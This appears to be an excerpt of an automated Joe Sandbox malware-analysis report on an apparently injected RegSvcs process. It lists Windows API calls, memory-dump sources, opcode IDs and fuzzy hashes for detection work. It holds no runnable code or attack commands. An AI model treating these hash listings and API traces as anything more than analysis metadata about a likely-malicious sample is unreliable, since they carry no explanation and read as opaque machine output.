                                                              • Instruction ID: 5faa6bbed66cfe1de0f865a8caf74bbcab7a55589e44bbc5bef3d64269eada33
                                                              • Opcode Fuzzy Hash: 8f8b47ae74243aca9be33ffea3a577d5bf1e5f990cc2506e0c6ded238b5a86a9
                                                              • Instruction Fuzzy Hash: FA712470A00B55CFD7A4DF69D44879ABBF1BF88304F008A2DD49AD7A50DB34E84ACB91

                                                               Control-flow Graph: function at 6e369c4 (basic-block graph, with executed/not-executed colouring, not reproduced; it contains the CreateWindowExW call block at 6e36a93)
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06E36AE2
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 51db759ab2995135124874a4c83b7250d9f50e6380f284bbfb0b61a50bebbd5c
                                                              • Instruction ID: 4bb5d7040dc01dcd95aba6d7995c24f60476032b53936b75273729608d921517
                                                              • Opcode Fuzzy Hash: 51db759ab2995135124874a4c83b7250d9f50e6380f284bbfb0b61a50bebbd5c
                                                              • Instruction Fuzzy Hash: 5551B0B1D00359AFDB14CFA9C984ADEBFF5BF48314F24812AE818AB215D7749885CF91

                                                               Control-flow Graph: function at 6e34acc (basic-block graph, with executed/not-executed colouring, not reproduced; it contains the CreateWindowExW call block at 6e36a53)
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06E36AE2
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 8d15e276d38633e17192dd00a42843df2db661d12bd8ecc0bb9ca26db150d32f
                                                              • Instruction ID: 75ebef038231b111011bbb406c91895286d0e4d1607c87435d50fc39b57074a3
                                                              • Opcode Fuzzy Hash: 8d15e276d38633e17192dd00a42843df2db661d12bd8ecc0bb9ca26db150d32f
                                                              • Instruction Fuzzy Hash: 5F51BEB1D00359AFDB14CFA9C884ADEBFF5BF48314F24812AE819AB210D775A845CF91

                                                               Control-flow Graph: function at 6e34c1c (basic-block graph, with executed/not-executed colouring, not reproduced; it contains the CallWindowProcW call block at 6e3902a)
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 06E39051
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: e8c515edfe19bfc659eabb8f05dc27e363ccd8c695704e8e4ffa477218c9ad1c
                                                              • Instruction ID: af6301402e14360fa38d5b88f57c4b11d2ff4eb08acfd24cb454f3e561a3b768
                                                              • Opcode Fuzzy Hash: e8c515edfe19bfc659eabb8f05dc27e363ccd8c695704e8e4ffa477218c9ad1c
                                                              • Instruction Fuzzy Hash: D94127B4900315CFDB54CF99C888AAABBF5FB88324F24C459D519AB321E775A841CFA0
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05BFB8A6,?,?,?,?,?), ref: 05BFB967
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 273faedb1935576969522fa5cfcdbbe9b970ed1aaddf910aaeae09c9af31cb92
                                                              • Instruction ID: 0e8ecd1fb78a5e76957771bb3563114e60c6e17c9367fc86c8f636f5e170757f
                                                              • Opcode Fuzzy Hash: 273faedb1935576969522fa5cfcdbbe9b970ed1aaddf910aaeae09c9af31cb92
                                                              • Instruction Fuzzy Hash: 5521E5B5900248DFDB10CF9AD584ADEBBF5FB48320F14846AE954A7310D374A944CFA5
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05BFB8A6,?,?,?,?,?), ref: 05BFB967
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 865c97900a3ab709a0f850039b812ac15e89a395e47a6630feada9094b8a2d9e
                                                              • Instruction ID: 0004af333ff19bf354b95db23b7f04c1522d13e18c000a3da6c1384485a20657
                                                              • Opcode Fuzzy Hash: 865c97900a3ab709a0f850039b812ac15e89a395e47a6630feada9094b8a2d9e
                                                              • Instruction Fuzzy Hash: 8F21E3B5900258DFDB10CFAAD984ADEBFF9FB48320F14805AE954A7250D378A944CFA5
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 0161F4AE
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 89b710acca92e4ed238fad8d50b12a0790d9563b27af47ff583318e783f1ded3
                                                              • Instruction ID: 9dcdc19dcb10050758ba7bb1a9c046d659c44d6474a9f31a3188e29fbe505309
                                                              • Opcode Fuzzy Hash: 89b710acca92e4ed238fad8d50b12a0790d9563b27af47ff583318e783f1ded3
                                                              • Instruction Fuzzy Hash: 26117274E011099FDB04DFA8D884AADBBB5FB88314F18D165F904E724ADB30A945CB64
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06E34404), ref: 06E3463E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 6907be3ef6d6406c37572c6d1f3ceeb4f0358b3b9242b513d236997b5177ad66
                                                              • Instruction ID: 3174d79d0a366ba5f8dd9214a237f206af3e43cb12cece5347e2067e462a93ab
                                                              • Opcode Fuzzy Hash: 6907be3ef6d6406c37572c6d1f3ceeb4f0358b3b9242b513d236997b5177ad66
                                                              • Instruction Fuzzy Hash: DA113FB5C00758CFCB10CF9AD448ADEFBF4EB88324F10806AD829A7250C378A944CFA1
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 06E3B52D
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID:
                                                              • API String ID: 2538663250-0
                                                              • Opcode ID: 702e6cd184edbe2b8289018e6a5ce629247c64b706881234aef3cee4f31aac7a
                                                              • Instruction ID: 286b5998fca0bfac934dfa387a9e8559be67f2be36d10653364a67e285b7c3a9
                                                              • Opcode Fuzzy Hash: 702e6cd184edbe2b8289018e6a5ce629247c64b706881234aef3cee4f31aac7a
                                                              • Instruction Fuzzy Hash: F91115B59003588FCB60DF9AD449BDEFBF4EB58324F108469D519A7210D378AA44CFA5
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 06E3B52D
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID:
                                                              • API String ID: 2538663250-0
                                                              • Opcode ID: e05459ee1ea09466265385192b80d06e862d7bd9cbf3b308957aec6d11b9efd5
                                                              • Instruction ID: 3d98f42427fcfc2fbe065ac56b7fe1fbc7a6a3db1fe79110ceb7a46fa337126d
                                                              • Opcode Fuzzy Hash: e05459ee1ea09466265385192b80d06e862d7bd9cbf3b308957aec6d11b9efd5
                                                              • Instruction Fuzzy Hash: F51133B58003488FCB20DF99D488BDEBFF4EB48324F208459D558A7210D379A540CFA5
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2950369967.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_12bd000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 939e6f8d5cc26a9451d285a24f5fbf3b15eea0c03b1a5fbda81144bd6ac4b731
                                                              • Instruction ID: 5332df3c7dcdaa1d2690927635f5cfd1849c05043c2bd4e81b95e48eb6b547b1
                                                              • Opcode Fuzzy Hash: 939e6f8d5cc26a9451d285a24f5fbf3b15eea0c03b1a5fbda81144bd6ac4b731
                                                              • Instruction Fuzzy Hash: 16216470524208DFCB11DF58C9C0BA6BBA1FB84398F20C96DD9094B252C37BD447CB62
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2950369967.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_12bd000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                              • Instruction ID: 571cbc4fc4c557d303ba1c24d1ece472ce483321ba6f41814b826d9e7fbba3fb
                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                              • Instruction Fuzzy Hash: 5311EB75504284CFCB12CF58C5C0B95BFA1FB84318F28CAAADD094B252C33AD40ACB62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$0oAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                              • API String ID: 0-2009027844
                                                              • Opcode ID: ebe86110b6e9927045728399a8230a13f5b8a65d2d3d1b9e4605ce8333f3cdb3
                                                              • Instruction ID: 8a1a9816179186b3c3c33a1f2c6f86c6a6a164ab2423a4c0929adf224e3fb5fc
                                                              • Opcode Fuzzy Hash: ebe86110b6e9927045728399a8230a13f5b8a65d2d3d1b9e4605ce8333f3cdb3
                                                              • Instruction Fuzzy Hash: DC327E74E002188FDB64CF69C994B9DBBB2FB49300F1084E9D919AB364DB75AE85CF10
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$0oAp$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                              • API String ID: 0-2641638890
                                                              • Opcode ID: 146eb736aff82789bbcf8fc633e7b9e629488f14245bb5ffd153b9b54926de8e
                                                              • Instruction ID: 597875e42353297bc8968abe2adce3266a192b0b2bee7fe84053e1f7fb0683e4
                                                              • Opcode Fuzzy Hash: 146eb736aff82789bbcf8fc633e7b9e629488f14245bb5ffd153b9b54926de8e
                                                              • Instruction Fuzzy Hash: 4202B0B4E002188FDB58CF69C994B9DBBB2FF89300F1081A9D519AB364DB759E85CF10
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xbq$$^q
                                                              • API String ID: 0-1593437937
                                                              • Opcode ID: 298b6d8d5d3d9009dbbf8ec41ccea3c641778532af73bd4ad078bea6af8216c4
                                                              • Instruction ID: 7088df0f53107853c043466b4ef4040e5545214fdf521ced99300c672f0f5968
                                                              • Opcode Fuzzy Hash: 298b6d8d5d3d9009dbbf8ec41ccea3c641778532af73bd4ad078bea6af8216c4
                                                              • Instruction Fuzzy Hash: 8F918470B002589BDB18DF789C5427EBBB6BFC4711B0A891DE54BE7388DE358802D796
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .5vq
                                                              • API String ID: 0-493797296
                                                              • Opcode ID: 67148e11f1a746ca7ce4ba83407d2d4af54ff2b22d8df7f2c06a31f2539e125b
                                                              • Instruction ID: 3cf4ab22c8622ce4f1ec6b48cb1a9494b0e9db710e815f480d19b8e4dcc18d6b
                                                              • Opcode Fuzzy Hash: 67148e11f1a746ca7ce4ba83407d2d4af54ff2b22d8df7f2c06a31f2539e125b
                                                              • Instruction Fuzzy Hash: C752AC74E01229CFDB64DF69C984B9DBBB2BB89300F1085E9D409AB254DB35AEC5CF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "
                                                              • API String ID: 0-123907689
                                                              • Opcode ID: b8432c34499a10f5d41d454583aa8b8d5534f4b7b84a14660e81e243bbc7aac3
                                                              • Instruction ID: 2ea1da5b2312953e2e99459e46686185f64a4471a9783bf9fb3e8a51e2ad970a
                                                              • Opcode Fuzzy Hash: b8432c34499a10f5d41d454583aa8b8d5534f4b7b84a14660e81e243bbc7aac3
                                                              • Instruction Fuzzy Hash: 95F10870D002588BEB15CFA9D88479DBFB2BF88314F28D169E808AB399D7759985CF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Hbq
                                                              • API String ID: 0-1245868
                                                              • Opcode ID: a5ba9a496bb35fe00560431bb92260bded3612a4ae85e06d74c85b86cb106b67
                                                              • Instruction ID: d52414673d34433d3cb1bcba3486484a550faa0e9f732a77f40bf52827a1e24c
                                                              • Opcode Fuzzy Hash: a5ba9a496bb35fe00560431bb92260bded3612a4ae85e06d74c85b86cb106b67
                                                              • Instruction Fuzzy Hash: A6E10574E00218CFDB54EFA9C944BADBBB2FB48304F2081A9D509AB365DB35AD85CF51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .5vq
                                                              • API String ID: 0-493797296
                                                              • Opcode ID: ec86fff29ad8b0c0a02d031e44b1171075cc100d1b86c8abb20c971b13692802
                                                              • Instruction ID: 54cec9c01f52041cd86519fc2940ba69ec9eb8a5164b5cafc363904b7d7d3ae7
                                                              • Opcode Fuzzy Hash: ec86fff29ad8b0c0a02d031e44b1171075cc100d1b86c8abb20c971b13692802
                                                              • Instruction Fuzzy Hash: A561E674E0021ACBDB28DF66D940BADB7B2FB88300F10C5A9D41967364DB355D85DF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: t
                                                              • API String ID: 0-2238339752
                                                              • Opcode ID: aa1cbb9fb84930802b991c2053c6c6bb482f8ac0f4aa413ec9e18e283a838be3
                                                              • Instruction ID: f7c34a6f668a53c89c33ccab92c7a4fff5ad774095a89667dc30b2b1d866d434
                                                              • Opcode Fuzzy Hash: aa1cbb9fb84930802b991c2053c6c6bb482f8ac0f4aa413ec9e18e283a838be3
                                                              • Instruction Fuzzy Hash: 744125B4D05248CFDB08CFAAD8406ADFBF2AF88300F20C16AC419BB264DB345949CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fe32914c3f8244218b7a61aa7738befe0b296f6553022a48be3998b63578577
                                                              • Instruction ID: 782c0f29ee9d20af0592f1f611b36ca3c3c0aeeaa698624581864721568adedc
                                                              • Opcode Fuzzy Hash: 2fe32914c3f8244218b7a61aa7738befe0b296f6553022a48be3998b63578577
                                                              • Instruction Fuzzy Hash: 6372DE74E052288FDB64DF69C980BEABBB2BB49300F1491E9D509A7351DB34AEC5CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d851fca2d2a56790b1f69b2d642d0466a00f5f8c37a6e3b85b57620815088be
                                                              • Instruction ID: bb6d98b47b3463f3c209f74c7ac0518f483cadf522a166b1e0e12cdf3a84cffa
                                                              • Opcode Fuzzy Hash: 3d851fca2d2a56790b1f69b2d642d0466a00f5f8c37a6e3b85b57620815088be
                                                              • Instruction Fuzzy Hash: B5F170B1900706CFE728CF24EC482997BB1FB85314F51A799D1526F2D8E7746466CF84
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c407c1d15a27e3160822dc69c29ae1a293402e4302a3dbf7abe4f3b347f170fe
                                                              • Instruction ID: 0357aaf4c8c50495e70ae0f2cec7842de8c4ddf8b3f8029811f233f4d8fb72f1
                                                              • Opcode Fuzzy Hash: c407c1d15a27e3160822dc69c29ae1a293402e4302a3dbf7abe4f3b347f170fe
                                                              • Instruction Fuzzy Hash: 01D15A34A003198FDB54DFA9C848BADBBF1BF54308F159168E41AAF2A5DB74E945CF80
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4841d331ab7481d01ef253db49d9d7fa1ffc6ad3adca997cc221df1ae09d494f
                                                              • Instruction ID: 7401d289fa3fb68c6158351d7116ef35a01628e89cd69230cd22d200fb9553ca
                                                              • Opcode Fuzzy Hash: 4841d331ab7481d01ef253db49d9d7fa1ffc6ad3adca997cc221df1ae09d494f
                                                              • Instruction Fuzzy Hash: 9CD1E274E00218CFDB54DFA9C954BADBBB2EF89300F1484A9D808AB365DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9fb4fd291f63f61820270913b0cacb4e00adfa3fce3494c92028571a87e1d80
                                                              • Instruction ID: 4d7f2c49ab5201f64c50e1fc119022e1097cd3bcd7f4da94aebaab30ddc07058
                                                              • Opcode Fuzzy Hash: b9fb4fd291f63f61820270913b0cacb4e00adfa3fce3494c92028571a87e1d80
                                                              • Instruction Fuzzy Hash: 77C1BF74E00218CFDB54DFA5C994BADBBB2FB88300F1081A9D909AB365DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa1863c4b90e4f453284495e41954a5454506fe17a307ef3ce9069d4960e1908
                                                              • Instruction ID: f19e5c3ef8d9d7f79d24257cd6b1049e95a9c152a2dc6d5981179eedbf47a23b
                                                              • Opcode Fuzzy Hash: fa1863c4b90e4f453284495e41954a5454506fe17a307ef3ce9069d4960e1908
                                                              • Instruction Fuzzy Hash: 4FC1AE74E00218CFDB54DFA5C994BADBBB2EF88300F1080A9D909AB365DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4596c513c1b5d396e533ee5f482d34a578980011999c8d50defb2520582bedc5
                                                              • Instruction ID: 155515f9f9091cee226b2108825ae341a30066b2e3b88a7ef0a350ee10135a76
                                                              • Opcode Fuzzy Hash: 4596c513c1b5d396e533ee5f482d34a578980011999c8d50defb2520582bedc5
                                                              • Instruction Fuzzy Hash: ACC1BF74E00218CFDB54DFA9C984B9DBBB2EF88300F1080A9D909AB355DB355E85CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6cf3d37d66909e4da493060a88a0a653fa94b0d21687b50c3fa0bf8a8dc52af5
                                                              • Instruction ID: 40002f9c1229b256a7e03e94032c78e3cfb01de165868a1e838a031e6e3e2fa0
                                                              • Opcode Fuzzy Hash: 6cf3d37d66909e4da493060a88a0a653fa94b0d21687b50c3fa0bf8a8dc52af5
                                                              • Instruction Fuzzy Hash: 33C1BE74E00218CFDB54DFA9C994B9DBBB2FB88300F1084A9D909AB364DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 047f42cd219cd4bd49e14e15a6b14a48721756f3882f1e7bde95349876684892
                                                              • Instruction ID: 85c0b3be42978d677884c7a59730b1c157692b0fd9dcaa4f83f4571f69216f4f
                                                              • Opcode Fuzzy Hash: 047f42cd219cd4bd49e14e15a6b14a48721756f3882f1e7bde95349876684892
                                                              • Instruction Fuzzy Hash: 50C1BF74E00218CFDB54DFA5C994BADBBB2FB88300F1081A9D909AB365DB359E85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f791e0f7174ce540d08dc91318590f4d7066f5cb7aeb0145854fb80f8cf8ca17
                                                              • Instruction ID: b5d35b57a311f00a007bd359e30bce2b9c91a90169c874e80dd28a581d0909e4
                                                              • Opcode Fuzzy Hash: f791e0f7174ce540d08dc91318590f4d7066f5cb7aeb0145854fb80f8cf8ca17
                                                              • Instruction Fuzzy Hash: 7CC1AF74E00218CFDB54DFA9C994B9DBBB2FB89300F1084A9D909AB364DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b83cbeff9e91db91d30318e65ec459180b2c5ff4c0b17775d6a64a93cf854a60
                                                              • Instruction ID: 9ce4005950affec8d18010944908ac78b06fc00053f565a3deb7f4e5d9e73618
                                                              • Opcode Fuzzy Hash: b83cbeff9e91db91d30318e65ec459180b2c5ff4c0b17775d6a64a93cf854a60
                                                              • Instruction Fuzzy Hash: 86C1AF74E00218CFDB54DFA5C994B9DBBB2FB89300F2080A9D909AB364DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 89f5f187d31321378800c3cd77faacd9757197e71469b4f7597874f2b1f04141
                                                              • Instruction ID: c13a61bad041f3aa3278615550244de09b5a38fc75907efba787e9b5c728a753
                                                              • Opcode Fuzzy Hash: 89f5f187d31321378800c3cd77faacd9757197e71469b4f7597874f2b1f04141
                                                              • Instruction Fuzzy Hash: 20C1AE74E00218CFDB54DFA5C994B9DBBB2EF88300F1081A9D909AB364DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92d95561d34df99fbcc3078c773f0c938a71aa1e212d805ccff328b4d3f773be
                                                              • Instruction ID: f4bdc0f8ffdae14550e66fc23ef3f9ac312906fbf36d7a03a30080f81f56adb8
                                                              • Opcode Fuzzy Hash: 92d95561d34df99fbcc3078c773f0c938a71aa1e212d805ccff328b4d3f773be
                                                              • Instruction Fuzzy Hash: CAC1BF74E00218CFDB54DFA9C994B9DBBB2FB88300F1081A9D909AB365DB359E85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
